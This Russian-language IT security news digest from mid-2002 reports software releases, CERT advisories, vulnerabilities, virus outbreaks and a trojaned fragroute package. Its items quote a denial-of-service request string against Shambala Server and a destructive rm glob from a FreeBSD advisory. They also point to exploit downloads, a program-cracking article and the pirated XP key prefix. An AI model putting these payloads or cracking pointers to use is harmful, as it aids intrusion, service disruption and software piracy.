Когда компания Microsoft объявила о выпуске первого пакета обновлений, беспокойные пользователи, жаждущие обновлений, тут же заинтересовались возможностью появления Service Pack 1 в свободном доступе. Повышенный интерес принес свои плоды: в день начала закрытого тестирования первой бета-версии SP1 последняя появилась в сети, доступная всем, кто решится испробовать недоделанный пакет обновлений на собственной системе. Ссылки на установочный файл Service Pack 1 Beta 1 появились на сайтах IEXBeta, IBelite, Warp2Search, Neowin, Windowsxp.nu, NVPlanet и других. Инсталлятор пакета обновлений (размер файла - 1,7 Мб) предназначен для запуска процесса установки SP1 и загрузки необходимых модулей с сайта компании Microsoft (около 30 Мб). Что же предлагает пользователю первый Service Pack для Windows XP? Во-первых, огромное количество патчей, решающих проблемы с безопасностью различных компонентов системы, как обнаруженных с момента выпуска ОС, так и исправленных в ходе двухмесячной работы над кодом Windows XP в Microsoft в рамках инициативы Trustworthy Computing. Во-вторых, в WinXP SP1 Beta 1 включены новые версии middleware-прогамм: Windows Messenger 4.7.0031, Internet Explorer 6.0 SP1 (build 2800.1050), Windows Media Player 8.0 (build 4483). Кроме того, наконец-то добавлена поддержка USB 2.0 и стандарта IPv6. В третьих, добавлена возможность скрытия всех middleware-программ (Microsoft пошла на этот шаг, выполняя требования соглашения по антимонопольному разбирательству - подробнее об этом здесь). И, наконец, новости для пользователей пиратских копий Windows XP со взломанной активацией. Как известно, обойти процесс активации продукта удалось путем использования корпоративной версии Windows XP, в которой активации просто не существует. Среди пиратских копий операционной системы широко распространена корпоративная версия Windows XP, с серийным номером, начинающимся на "FCKGW". Более подробно - http://www.compulenta.ru/2002/6/7/30648/
8/06/2002 Вышел SuSe Linux 8.0.
На FTP-сервере выложена 8-я версия SuSe Linux. Скачать - ftp://ftp.suse.com/pub/suse/i386/8.0/
7/06/2002 Новая версия пакета TFakeDll v1.1 (Beta 2)..
Что нового: + Ядро переписано на C++ - как следствие увеличена скорость работы. + Все теперь в отдельном obj файле - линкуется с любой версией Delphi. + Переписана работа с ошибками - теперь обьект кидается сообщениями сам. + GetFDProcAddress теперь имеет один параметр, т.е. сама разбирает где ординалы, а где строки. Скачать здесь: http://www.uinc.ru/scripts/load.cgi?files/dr.golova/TFakeDll.zip
7/06/2002 Выход FreeBSD 4.6-RC4.
Murray Stokely, в списке рассылки freebsd-stable, объявил недавно о доступности FreeBSD 4.6-RC4 для платформы i386. Как ожидается, это последний RC перед 4.6-RELEASE, который должен выйти завтра-послезавтра. В анонсе большой акцент делается на тестирование packages. И не удивительно, недавно их число привысило 7000. В relnotes указан sendmail 8.12.3, однако в списках рассылки проходила информация о коммите патчей, исправляющих выявленные проблемы в безопасности. То есть релиз их содержать не будет, хотя 8.12.4 в этот релиз вроде не пройдёт. Подробности - ftp://ftp2.freebsd.org/pub/FreeBSD/releases/i386/4.6-RC4/RELNOTES.HTM
7/06/2002 Iptables-tutorial на русском языке.
На сайте gazette.linux.ru.net выложен туториал по iptables-брандмауэру с фильрацией пакетов, встроенному в ОС Linux с ядрами версии 2.4 (в ядрах 2.2 подобный брандмауэр назывался ipchains, в 2.0 - ipfw). Перевод выполнен довольно качественно. Рекомендуется к прочтению администраторам, начинающим ознакамливаться с версиями 2.4 (либо переходящими с 2.2 на 2.4). Tutorial - http://gazette.linux.ru.net/rus/articles/iptables-tutorial.html
6/06/2002 Русская Mozilla.
Русская локализация интерфейса Mozilla-1.0 завершена, почти полностью переведена справка. Это гигантскую работу выполнили Валентина Ванеева из Томска (консорциум "Сибкон") и Вадим Виниченко из Москвы. В русские сборки для Linux и Win32, выполненные ALT Linux, включены проверка орфографии и сглаживание шрифтов для Linux. Подробности - http://www.mozilla.ru
6/06/2002 Статья об установке и настройке qmail под linux.
Антон Халиков закончил статью по установке и настройке qmail-одной из разновидностей почтового сервера (MTA) под Linux, о чём он известил всех в своём анонсе на linux.org.ru. Примечательное в этой статье: 1. Она полностью на русском языке. 2. Она содержит пошаговую инструкцию "для чайников" как с нуля установить и запустить qmail. 3. Она содержит ответы на многие вопросы, постоянно задаваемые в форуме LOR. Всем интересующимся посвящается ... Cтатья - http://www.uporov.ru/articles/tech/article2/
6/06/2002 Статья "Bypassing JavaScript Filters - the Flash! Attack".
На сайте eyeonsecurity.net опубликована довольно любопытная статья "Обхождение JavaScript-фильтров - Flash! атака". В ней EyeonSecurity описывает loophole-уязвимость, которая присутствует в Web-серверах, позволяющая встраивать Flash-документы внутрь HTML-кода или аплоадить их на сервер. Так как огромное количество посетителей Web-сайтов имеют Macromedia Flash plugin/ActiveX control, это позволяет проводить атаки типа XSS (Cross Site Scripting). Подобное встраивание Flash-документов позволяет обойти многие существующие JavaScript-фильтры. Cтатья доступна в HTML и PDF-форматах. Статья (HTML) - http://eyeonsecurity.net/papers/flash-xss.htm PDF-формат - http://eyeonsecurity.net/papers/flash-xss.pdf
6/06/2002 CERT предупреждает об уязвимостях в Yahoo! Messenger.
Вчера CERT выпустил очередное уведомление за номером CA-2002-16, в котором говорится о существовании серьёзной уязвимости в Yahoo! Messenger - программе, предназначенной для обеспечения прямой связи между компьютерами в Internet (ICQ-подобная). Ранее о каждой из них проходила информация в BUGTRAQ. Уязвимостям подвержены все версии до 5.0.0.1064 включительно для ОС Windows. Атакующий в результате эксплуатирования этих уязвимостей получает возможность выполнения произвольного кода на машине жертвы. Уязвимость с кодом VU#137115 - возможность получения переполнения буфера в указателе URI (ymsgr:). Код CAN-2002-0031 по классификации CVE. Вторая уязвимость (VU#172315) cвязана с тем, что функция "addview" Yahoo! Messenger позволяет автоматически выполнять код, содержащийся на Web-странице. Код CVE - CAN-2002-0032. 22 мая Yahoo! выпустила новую версию своего мессенджера 5.0.0.1065 и начала работать над версией 5.0.0.1066 с возможностью автообновления. Всем пользвоателем рекомендуется обновиться до версии 5.0.0.1065 или выше. Подробности - http://www.cert.org/advisories/CA-2002-16.html
6/06/2002 Уязвимость в маршрутизаторах Telindus 11xx.
В маршрутизаторах Telindus серии 11хх обнаружена уязвимость, позволяющая атакующему получить полный контроль надо роутером. Маршрутизаторы этого типа имеют управляющую программу, которую можно свободно загрузить с сайта производителя (http://www.telindus.com). Эта программа предназначена для удалённого управления роутером. Работает она следующим образом. Посылается широковещательный UDP-пакет для обнаружения роутера в LAN. После ответа роутера посылается направленный UDP-пакет, на который роутер отвечает UDP-пакетом, содержащим, помимо всего прочего информацию о номере релиза ПО, имени роутера и пароле для доступа к роутеру. Вся информация передаётся в чистом виде (без шифрования). Весь траффик проходит через порт UDP 9833. Возможности уязвимости очевидны. На LAN достаточно прослушивающей утилиты для получения пароля, на WAN можно использовать программу, которая посылает запрос, имитируя работу программы администрирования (либо использовать программу администрирования с сайта производителя). Для предотвращения атаки снаружи рекомендуется на внешнем файрволле фильтровать траффик на UDP-порт 9833. Производитель работает над патчем. Подробности - http://www.tigerteam.it/files/telindus-advisory.txt
6/06/2002 Вчера вышла Mozilla 1.0.
Ну вот и дождались. Наконец-то вышел окончательный релиз 1.0 популярного Вэб-броузера Mozilla. Об этом было официально объявлено на сервере разработчиков. Это событие произошло после нескольких предварительных релиз (RC1, RC2). Применённый в броузере движок рендеринга Gecko доступен в открытых кодах и может применяться в разработке других приложений, в том числе и броузеров. Tooolkit Mozilla применён при создании довольно приличного броузера Galeon. Для установки новой версии Mozilla в Windows предъявляются следующие требования: ОС 95/98/ME/2K/XP, процессор не ниже 266, 64 МБ RAM, 26 MB места на диске. Для Linux необходимо наличие библиотек glibc 2.1, XFree86 3.3.x, GTK 1.2.x, Glib 1.2.x, Libstdc++ 2.9.0. Необходимо также отметить, что исходя из дискуссии, разгоревшейся на форуме linux.org.ru, уже найдено приличное количество багов и складывается впечатление, что mozilla.org несколько поторопилась с выходом окончательного релиза версии 1.0. Подробности - http://www.mozilla.org/releases/mozilla1.0/
5/06/2002 KDE представит версию 3.0.1 для OS X и Solaris.
На начинающейся завтра в немецком городе Karlsruhe выставке LinuxTag 2002 команда разработчиков графической оболочки KDE представит два порта последнего релиза своей оболочки: платформа Sun UltraSPARC 60 (OC Solaris) и платформа Apple iBook G4 с Mac OS X. Таки образом разработчики KDE доказывают, что их графическая оболочка способна работать не только на Linux, но и на других UNIX-платформах. Команда Fink, занимающаяся портированием в среды Darwin и Mac OS X свободно распространяемого софта для платформы Apple, приняла непосредственное участие в портировании KDE для Mac OS X. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-06-05-005-26-PR-KE
5/06/2002 PowerChute plus 5.0.2 for Windows 95/98 (APC (American Power Conversion Corp.) http://www.apc.com) - Утилита мониторинга источников бесперебойного питания. После установки, без ведома пользователя открывает полный сетевой доступ под именем PWRCHUTE к своему каталогу Program Files\Pwrchute. Все файлы в каталоге перезаписываемы по сети, что делает компьютер уязвимым к сетевым атакам и вирусам. Уязвимость обнаружена командой ISP PLANET 27 мая. Не исключено, что проблема имеется и в других версиях PowerChute и прочих утилитах от APC. American Power Conversion Corp. была извещена в тот же день, на русском и английском языках, реакции не последовало.
Reported by: http://isp.people.dn.ua
5/06/2002 Статья "Бут-вирус под Windows'98: старые звери в новом лесу".
1 июня на хорошо известном всем сервере Дмитрия Леонова www.bugtraq.ru была выложена статья Chingachguk "Бут-вирус под Windows'98: старые звери в новом лесу". В статье рассматривается возможность реализации загрузочного вируса, способного функционировать под Windows. Под возможностью функционирования понимается способность программы поражать стандартные мишени - бут-сектора дискет. В значительной степени эта статья является продолжением и дополнением книги Игоря Коваля "Как написать компьтерный вирус". В бумажном виде была опубликована в журнале "Радиомир. Ваш компьютер", #3, 2002. Рекомендуется для прочтения вирусописателям и интресующимся программированием низкого уровня на языке ассемблер. Ссылка - http://www.bugtraq.ru/library/internals/boot.html
5/06/2002 Информационное уведомление CERT: серьёзная уязвимость в ISC BIND 9.
Вчера CERT выпустил уведомление за номером CA-2002-15, в котором сообщается о серьёзной уязвимости в 9-й версии Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) сервере-программе, обеспечивающей фунцкционирование DNS-сервера. Обнаруженная уязвимость присутствует только в версии 9 (в версии 8 и 4 BIND её нет). Атакующий может вызвать выключение (shutdown) DNS-сервера, послав специальный DNS-пакет, который вызывает проверку внутренней последовательности (internal consistency check). Эти условия выполняются, когда параметр rdataset функции dns_message_findtype() в message.c является ненулевым (NULL). При этом программа выдаёт сообщение об ошибке и вызывает функцию abort() для отключения BIND. Так как функционирование различных сетей в Интернете построено и напрямую завиcит от правильного функционировании DNS-сервера, подобная уязвимость может серьёзно сказаться на работе подобных сетей. Все производители операционных сетей были оповещены и работают над патчами и обновлёнными версиями BIND. Сама же ISC выпустила обновлённую версию своего сервера 9.2.1. Администраторам рекомендуют либо применить патчи от фирм-производителей ОС, либо ставить новый пакет ISC BIND из исходников новой версии. Подробное описание - http://www.cert.org/advisories/CA-2002-15.html ISC BIND 9.2.1 - http://www.isc.org/products/BIND/bind9.html
5/06/2002 Обновление пакетов Red Hat.
Red Hat Inc. выпустила обновлённые пакеты следующих своих пакетов: Xchat, BIND и Ghostscript. Все обновления связаны с проблемами в безопасности этих пакетов. Xchat обновился до версии 1.8.9-1.62, BIND-9.2.1, Ghostscript до 6.51-16.1.6x.1. Наиболее критичным в этом обновлении является обновление BIND. Подробности - http://bugzilla.redhat.com/bugzilla
5/06/2002 Уязвимость в snmpdx ОС Solaris.
Entercept's Ricochet team обнаружила уязвимость в Sun Solstice Enterprise Master Agent(snmpdx) - SNMP-компоненте, который запускается демоном на 161/UDP порту и слушает входящие SNMP-запросы. Буфер в компоненте, разбирающем MIB-запросы не проверяется на размер и в итоге может быть превышен с записью на его место выполнимого кода. Также была обнаружена уязвимость формата строки в протоколирующем (logging) компоненте snmpx, устанавливающимся по умолчанию в ОС Solaris. Наличие обоих вышеприведённых уязвимостей позволяет удалённому атакующему получить полный контроль над уязвимым сервером. Уязвимость присутствует в версиях Solaris 2.6, 7 и 8. Необходимо отметить, что фирма Sun тут же выпустила информационное уведомление с рекомендованными патчами за номером #00219. Подробное описание - http://www.entercept.com/news/uspr/06-03-02.asp Описание и патчи от SUN - http://sunsolve.sun.com/pub-cgi/secBulletin.pl
5/06/2002 Очередное переполнение буфера в Microsoft Internet Explorer.
На этот раз уязвимость была обнаружена во встроенном в IE gopher-клиенте. Обнаружил её Jouko Pynnonen из финской компании Online Solutions Ltd. Gopher - это протокол, представленный в начале 90-х гг. универститетом штата Минессота. Различные gopher-серверы предоставляли информацию пользователям в виде иерархии каталогов и файлов. Подобное "гоферпространство" было вытеснено появившимися позже HTTP-протоколом и WWW. Тем не менее, клиент gopher встроен во все броузеры. Для получения доступа к gopher-серверу необходимо сформировать URL вида gopher://gopherserver. Часть кода gopher-клиента, которая разбирает ответы сервера имеет уязвимость, позволяющую выполнить переполнение буфера, и, как результат, выполнить на компьютере пользователя произвольный код. При переполнении буфер фиксированного размера в стеке перезаписывается данными, принятыми с gopher-сервера (размер буфера до 255 байт). Возникает возможность заполнить этот буфер каким-либо выполнимым кодом-типичное тривиальное переполнение буфера. При проверке тестировались версии IE 5.5 и 6.0. Атака может быть запущена с HTML-страницы или почтового сообщения, которые перенаправляют пользователя к злонамеренному Gopher-серверу. Для успеха даже необязательно наличие полноценного сервера, достаточно иметь маленькую программу, слушающую порт и отправляющую при запросе необходимые данные. Майкрософт был оповещён и работает над патчем. До его выхода подробные детали не разглашаются. Более полная информация и меры временные меры защиты описаны в ссылке ниже. Подробности - http://www.solutions.fi/index.cgi/news_2002_06_04?lang=eng
5/06/2002 Ошибка в аутентификационном модуле прокси-сервера SQUID.
DAVID EVLIS REIGN обнаружил уязвимость в модуле аутентификации SQUID MSNT (http://stellarx.tripod.com), предназначенного для утентификации пользователей в NT-домене. В модуле allowuser этой программы присутствует системный вызов syslog() с неправильно проверяемыми параметрами (уязвимость типа формата строки (format string vulnerability)). Подобная ошибка присутствует и в модуле denyuser. В результате возникает опасность удалённого выполнения кода на машине (автор указывает на ОС Win-98|me|2000|xp). Эксплоит пока не вышел. Исчточник - http://www.securityfocus.com
5/06/2002 Вышел Sendmail 8.12.4.
Это bug-fix релиз. Список изменений небольшой, многие из них связаны с изменением прав доступа к некоторым файлам. Версия 8.12 стабилизируется. Подробности - http://www.sendmail.org/8.12.4.html
4/06/2002 Tutorial: Adding Additional Hard Drives in Linux.
На сайте www.linuxplanet.com опубликована статья Александра Прохоренко, которая детально и очень доходчиво объясняет, как добавить новый HDD в операционной системе Linux. Обычно подобная проблема возникает у начинающих пользователей Linux, перешедших в эту ОС с Windows. Автор на конкретных примерах показывает, что подключить HDD в Linux не сложнее, чем в Windows. Содержит в себе несколько разделов: Введение, подключение диска с информацией, подключение нового диска, форматирования диска. Будет полезна начинающим пользователям (администраторам) Linux. Cтатья - http://www.linuxplanet.com/linuxplanet/tutorials/4232/1/
4/06/2002 Уязвимости в QNX.
Как сообщается в BUGTRAQ, обнаружены множественные уязвимости в операционной системе QNX. Ранее по рассылке проходила информация о возможности создания жёстких ссылок на критичные файлы системы с возможностью их дальнейшего просмотра и даже редактирования. Однако автор того сообщения (Simon Ouellette) использовал версию 4.25 QNX, на что один из разработчиков (Kris Warkentin) вполне резонно ответил, что последней версией QNX является ОС серии 6 (конкретно-6.2), в которой этой уязвимости нет. Сегодня же в сообщении в BUGTRAQ ребята с сайта www.badc0ded.com указывают на наличие в QNX уязвимостей в различных программах, при этом не указывается версия ОС QNX (хотя в самих исходниках некоторых эксплоитов указывается версия 6.1.0). Первая уязвимость касается возможности любого процесса пользователя присоединиться к любому процессу. При этом при помощи системного вызова ptrace() можно изменить свою uid/euid (на рута, например) и после вызова отладчика gdb получить в /tmp cкрипт, при запуске которого можно стать суперпользователем. Вторая уязвимость связана с тем, что при приёме /bin/su сигнала SIGSEGV, программа "выкидывает" core-файл, который доступен для чтения локальным пользователям. Третья уязвимость связана с программами phgrafx, phgrafx-startup. Последняя (четвёртая) связана с возможностью переполнения буффера в программах phlocale и pkg-installer. Сообщений от разработчиков пока не поступало. Эксплоиты в виде шелл-скриптов и исходников на С доступны по ссылке ниже. Эксплоиты для QNX - http://www.badc0ded.com/modules.php?name=Downloads&d_op=viewdownload&cid=1
4/06/2002 "Троянец" охотится на выпускников .
Неистребима привычка наших людей к "халяве". Зачастую этой особенностью русской души успешно пользуются создатели различных вирусов и червей. О подобном случае и пойдёт речь. Обнаружен и нейтрализован вредоносный Web-сайт, распространявший под видом билетов для грядущих выпускных экзаменов троянскую программу "CrazyBilets". 2 июня в общедоступной системе домашних страниц Народ.ру был обнаружен Web-сайт с красноречивым названием "Выпускные экзамены 2002". На нем анонимный автор предлагал посетителям загрузить файл с экзаменационными билетами по литературе и математике. При его запуске на компьютер действительно копировался список тем сочинений, якобы, для грядущих выпускных экзаменов, а также троянская программа "CrazyBilets". Незаметно для владельца зараженного компьютера "троянец" создает свою копию в каталоге Windows под именем SYSTEM.EXE и регистрирует ее в ключе авто-запуска системного реестра. Будучи активным, "CrazyBilets" просматривает содержимое буфера обмена данными, ищет в нем пароли и передает их злоумышленнику по электронной почте. Таким образом, нежелательные лица могут получить управление зараженным компьютером и контролировать все действия пользователя. Администрация Народ.ру утром 3 июня данный вредоносный сайт ликвидировала. Источник - http://www.viruslist.com/index.html?tnews=1001&id=303374
4/06/2002 Вирусная двадцатка (май 2002) .
Лаборатория Касперского опубликовала вирусную двадцатку за май этого года. Как и следовало ожидать, первое место с большим отрывом занимает вирус Klez-96,49%, на втором месте Win95.CIH-0,84%, на третьем I-Worm.BadtransII-0,52%. Статистика, конечно же, приведена от общего количества официально зарегистрированных инцидентов. Подробности - http://www.viruslist.com/index.html?tnews=1007&id=303377
4/06/2002 Релиз perl 5.8.0 RC 1.
Вышел первый релиз-кандидат новой версии популярного языка скриптов Перл. Как пишется в анонсе, эта версия поставляется только в исходниках и для получения рабочего пакета необходимо наличие пакета разработчика на С. Perl 5.8.0 явлвется кардинально новым релизом, содержащим новые возможности, расширение существующих возможностей и множество багофиксов. Однако сами разработчики не рекомендуют пока использовать RC1 на рабочих системах, ввиду возможности наличия ошибок. Подробности - http://use.perl.org/articles/02/06/01/1944202.shtml?tid=6
4/06/2002 Выход Linux 2.4.19-pre10.
Марцелло Тосатти объявил о выходе 10 пререлиза очередной версии стабильного ядра Linux. Напомним, что ранее Линус Торвальд отдал в руки 18-летнего Марцелло координацию действий по выпуску стабильных ядер Linux, полностью переключившись на развитие девелоперских версий ядра. Полный ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.4/testing/patch-2.4.19.log
4/06/2002 У нас новая статья: Пример взлома программ защищеных с помощью криптоалгоритма MD5..
В статье показывается, как взломать прогамму, защищенную MD5. Взлом построен на нахождении слабых мест в реализации криптоалгоритма в программе. Ознакомиться: http://www.uinc.ru/articles/32/index.shtml
4/06/2002 Europe bans spam.
Наконец-то Европейский Парламент "положительно" проголосовал против коммерческой массовой рассылки писем. Закон, который планируют привести в силу в следующем году, будет разрешать рассылку только если человек выбрал ее получение, то есть подписался. Более того, были введены дополнительные ограничения на использование кукиесов, теперь юзер должен быть предупрежден, что о нем собирают информацию с помощью печенюшек. Тем не менее, ходят слухи, что такой закон ничего не изменит, так как 9 из 10 "грязных" сообщений не приходят из Европы. Источник: http://www.theregus.com/content/6/25107.html
3/06/2002 Описание Конструктора BAT.BWG .
Лаборатория Касперского опубликовала описание конструктора вирусов BAT.BWG. Конструктор BAT.BWG создает вредоносные программы на BAT языке. Написан на языке Basic для DOS. Может создавать программы таких типов: интернет-черви, mIRC-черви, pIRC-черви. Поддерживает инсталляцию в win.ini, инсталляцию в ключ автозапуска системного реестра, инсталляцию в каталог автозапуска. Описание - http://www.viruslist.com/index.html?tnews=1009&id=294308
3/06/2002 Вирус, заражающий Win32 и Linux платформы.
22 мая Symantec объявила о выходе вируса, который с одинаковым успехом заражает как Win32 (PE-файлы), так и Linux (ELF-32 бинарники)-платформы. Это первый известный полиморфический вирус, который способен заражать обе платформы. В принципе, он довольно безобиден-никаких деструктивных действий не производит, заражённый файлы по определённым датам выводят сообщение. Называется Simile и имеет 4 разновидности. Более подробно - http://www.symantec.com/avcenter/venc/data/linux.simile.html
3/06/2002 Краткое введение в OpenBSD.
На сайте LowEndPC.com. опубликовали краткое введение в OpenBSD с довольно занимательным эпиграфом: "Good-bye Slackware Linux, Hello OpenBSD". Авторы утверждают, что после инсталляции OpenBSD можно добиться полноценного функционирования системы после 30 минут настройки, чего нельзя достичь даже в Slackware за три недели. Даже модем Alcatel USB сразу заработал без перекомпиляции ядра. Подробнее - http://www.lowendpc.com/dp/2002/0524.html
3/06/2002 Вышел Linux 2.5.20.
Линус Торвальд сообщает о выходе очередной версии девелоперского ядра ветки 2.5. Из анонса: "ACPI merge, merges from Dave Jones, IDE updates, stuff from Andrew, PPC64 update, e100[0] driver updates, the works.." Полный CHANGELOG - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.20
3/06/2002 Выпущена новая версия программы XSpider: 6.02 Final.
В ней добавлено большое количество новых уязвимостей, проверки на новые DOS-атаки, поиск стандартных DOS-атак в FTP-серверах. Сделана проверка на логины и пароли по умолчанию в FTP и POP3 серверах. Сильно переработан внешний вид отчета. Исправлены мелкие ошибки. Скачать здесь: http://www.xspider.ru
3/06/2002 Новый опасный вирус Sulpex.
"Лаборатория Касперского" сообщает об обнаружении нового достаточно опасного вируса Win32-вирус Sulpex. Вирус является Win32 PE EXE файлом, имеет размер около 230 Кб, написан на Delphi и запакован UPX. Вирус ищет все файлы на дисках от A: до Z:, за исключением файлов в директории Windows, и заражает файлы с расширением .EXE, а остальные - шифрует. При заражении вирус копирует оригинальный файл, добавляя к его имени префикс "prm" (например, "prmCALC.exe"), а сам оригинальный файл перезаписывает своей копией. Sulpex зашифровывает первые 4000 байт файлов, имеющих расширение, отличное от .EXE. Подробности - http://www.viruslist.com/index.html?tnews=1001&id=294376
2/06/2002 KDE 3.0.1 портирован на платформы Darwin и MacOS X.
Сообщается об успешном портировании KDE на платформы Darwin и MacOS X. Cписок пакетов включает в себя Konqueror, KOffice, KDevelop и другие пакеты. Целью подобного портирования было "принести в Darwin и MacOS X мир открытого программного обеспечения UNIX". Подробности - http://dot.kde.org/1022869694/
1/06/2002 Уязвимость в Shambala Server 4.5.
Шведская группа Telhack обнаружила уязвимость в Shambala Server-WWW и FTP-сервере для ОС Win 9*/NT. Эта уязвимость позволяет просмотреть содержимое любой директории коипьютера, на котором установлен этот сервер, получить доступ к любом файлу, а также к файлу паролей, которые хранятся в открытом виде в корнейвой директории Web-сервера. Кроме этого, можно вывести из строя Web-сервер (DoS-атака), послав запрос вида GET !"#¤%&/()=?. Как сообщают авторы, эта программа была загружена 57.957 раз с сервера www.download.com, в том числе около 40 раз за прошлую неделю. Подробности - http://swesec.darktech.org/new/sec/adv/th026inc-sa3.txt
1/06/2002 Присутствие "чёрного хода" в программах с www.monkey.org.
Вчера в списке рассылки BUGTRAQ Андерс Норби из Норвегии сообщил о наличии троянца/"чёрного хода" в пакете fragroute-1.2. "Чёрный ход" присутствует в конфигурационном скрипте configure. При установке пакета при помощи этого скрипта порождается шелл, производится соединение к определённому хосту в Интернете (IP-адрес 216.80.99.202, порт-6667) с полным доступом к уязвимой машине (скрипт запускается от имени root). Необходимо отметить, что наличие подобного же "чёрного хода" было ранее обнаружено в irssi-IRC-клиенте. В ответ на это письмо Dug Song, который поддерживал этот и другие пакеты, сообщил, что сервер www.monkey.org был взломан 14 мая через уязвимость в epic4-pre2.511. В 3 часа ночи 17 мая были изменены пакеты dsniff-2.3, fragroute-1.2, fragrouter-1.6. В каждом из них был подобным образом изменён скрипт configure. Исправлены пакеты были только через неделю. Согласно статистике сайта, за это время "троянизированными" исходниками были осчастливлены 1951 хост, из которых: 992 были Windows-машинами, 192 автоматически обновили порты *BSD-пакетов. В результате около 746 Linux (и несколько MacOS и Solaris)-машин и около 20 FreeBSD и OpenBSD-машин потенциально уязвимы. Всем, кто в это время качал вышеназванные пакеты рекомендуется проверить их MD5-сумму, снести уязвимые пакеты и поставить исправленные. Кратко о вышесказанном - http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
1/06/2002 M-o-o-t: операционная система от любопытных.
Группа борцов за гражданские свободы M-o-o-t выпускает одноименную операционную систему и набор ПО для безопасной работы в сети. M-o-o-t, по идее, предотвращает саму возможность вторжения на компьютер пользователя со стороны кого бы то ни было, включая всякие государственные органы надзора. Как сообщается на m-o-o-t.org, система разрабатывается с 2000 года с целью противодействовать всевозможным системам слежки вроде Carnivore, как известно, "расстраивающего" своих создателей. Разработчики обещают, что M-o-o-t будет эффективнее всяких криптографических систем, тем более, что последние законодательные инициативы в Европе и Австралии подразумевают предоставление властям любой информации и шифровальных ключей по требованию. M-o-o-t будет состоять из операционной системы (скорей всего, урезанного варианта FreeBSD, хотя разработчики рассматривают и другие "кандидатуры", например LINUX), драйверов, коммуникационного, шифровального и прикладного ПО. Все это будет умещаться на одном CD, и работать, пока этот диск будет находиться в приводе. Покуда M-o-o-t работает, остальные запоминающие устройства, включая жесткие диски, floppy, CDR и т.п. окажутся недоступны. Вся информация операционной системы будет храниться на различных удаленных серверах, так что, если "любопытствующий" влезет на компьютер пользователя, он там ничего не найдет, а если вломится на удаленный сервер, ему в руки не попадет ни одного цельного файла. Черновой код (draft) разработчики планируют представить в июне. Источник - http://securitylab.ru/?ID=31207 Cайт разработчиков - http://www.m-o-o-t.org/
31/05/2002 Кейлоггерз форева!.
Информация взята с сервера Дмитрия Леонова www.bugtraq.ru. Кейлоггеры. Сколько мозгов вскипело над проблемой их написания и внедрения: как сделать его маленьким, как внедрить (операционки-то разные!), куда складывать добытые данные? Amerisco подошли к проблеме радикально: встроили кейлоггер прямо в клавиатуру. Клавиатура выглядит обычно, но внутри есть одна злобная микросхемка и флеш (до 2 мегабайт), которые записывают все нажатия клавиш (хоть в винде, хоть в линуксе, хоть при работе с BIOS). Питание для этой штуки не критично (флеш!), специальные драйвера не нужны. Более того, не нужен специальный софт и для вытаскивания наловленной информации, достаточно просто предъявить пароль. Первоисточник - http://www.amecisco.com/hkkeyboard.htm
31/05/2002 Remote Exploit for UW-IMAPd Capability (IMAP4).
Группа SecuriTeam опубликовала эксплоит, удалённо "пробивающий" IMAP4-сервис UW-IMAPD. Необходимо отметить, что большинство производителей дистрибутивов уже выпустили обновлённые версии IMAPD. Описание и эксплоит - http://www.securiteam.com/exploits/5FP0X0075C.html
31/05/2002 FreeBSD 4.6 RC3 is out.
Третий кандидат на релиз доступен на ftp. Найдены и устранены несколько проблем с безопасностью. Запомнилось описание одной из них: "When removing X Windows lock files, rc uses the rm(1) command and shell globbing: rm -f /tmp/.X*-lock /tmp/.X11-unix/* Since /tmp is a world-writable directory, a user may create /tmp/.X11-unix as a symbolic link to an arbitrary directory. The next time that rc is run (i.e. the next time the system is booted), rc will then remove all of the files in that directory." Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/4.6-RC3/RELNOTES.HTM
31/05/2002 Анти RedHat-консорциум.
Во вторник такие компании Linux-сообщества, как Caldera, SuSE, Turbolinux и Conectiva обьявили, что собираются обьеденить усилия для создания 'United Linux'. А цель у них - ну очень высокая - дружно дать по башке компании RedHat. Подробности - http://www.linuxgram.com/article.pl?sid=02/05/28/2053225
31/05/2002 NetBSD 1.6 Release.
На CVS нарезали новую ветку. Список изменений весьма ощутимый. Подробности - http://www.netbsd.org/Changes/changes-1.6.html
30/05/2002 Microsoft бьет тревогу по поводу дыры в Exchange .
В среду Microsoft распространила предупреждение об обнаруженной в ПО электронной почты Exchange 2000 ошибке, которая позволяет хакерам выводить из строя серверы e-mail. Проблема, которую Microsoft классифицирует как «критическую», затрагивает серверы e-mail на базе Exchange 2000. Специальные сообщения, созданные с использованием версий формата SMTP RFC 821 и 822, обычно применяемых в программах e-mail, могут привести к тому, что центральный процессор сервера, пытаясь прочесть эти сообщения, будет загружен на 100%. В результате ничем другим до окончания обработки сообщения он заниматься не сможет, то есть подвергается атаке на прекращение обслуживания (denial-of-service). Подробности: http://zdnet.ru/?ID=192110
30/05/2002 Банкноты евро с чипом.
По информации Electronics Weekly Hyperactive, Центральный европейский банк (ECB) планирует присоединиться к проектам, в рамках которых разрабатываются достаточно миниатюрные процессоры, для того чтобы их можно было встраивать в банкноты. Подробности: http://www.compulenta.ru/2002/5/30/30273/
30/05/2002 Ким Шмитц приговорен к тюремному заключению и штрафу.
Немецкий интернет-миллионер Ким Шмитц, называющий себя "суперхакером", был признан виновным в использовании инсайдерской информации при операциях с ценными бумагами. Суд приговорил Шмитца к 20 месяцам тюремного заключения и штрафу в размере 100000 евро. Фирменный стиль ведения бизнеса по-шмитцовски состоит в скандальных публичных заявлениях. В одном из таких выступлений Шмитц заявил, что ручается за долги одного веб-сайта, стоимость акций которого немедленно подскочила на 150 процентов. Однако, на следующий день Шмитц с огромной прибылью продал все принадлежащие ему акции этого сайта. Сегодня акции LetsBuyIt.com практически ничего не стоят. Источник: http://www.compulenta.ru/2002/5/29/30212/
30/05/2002 В сниффере для UNIX, Ethereal, найдены четыре потенциальные возможности для создания эксплоитов.
Недочеты найдены в: SMB dissector, X11 dissector, DNS dissector и в GIOP dissector. Подробности: http://online.securityfocus.com/archive/1/274543/2002-05-27/2002-06-02/0
30/05/2002 Переполнение в Macromedia JRUN.
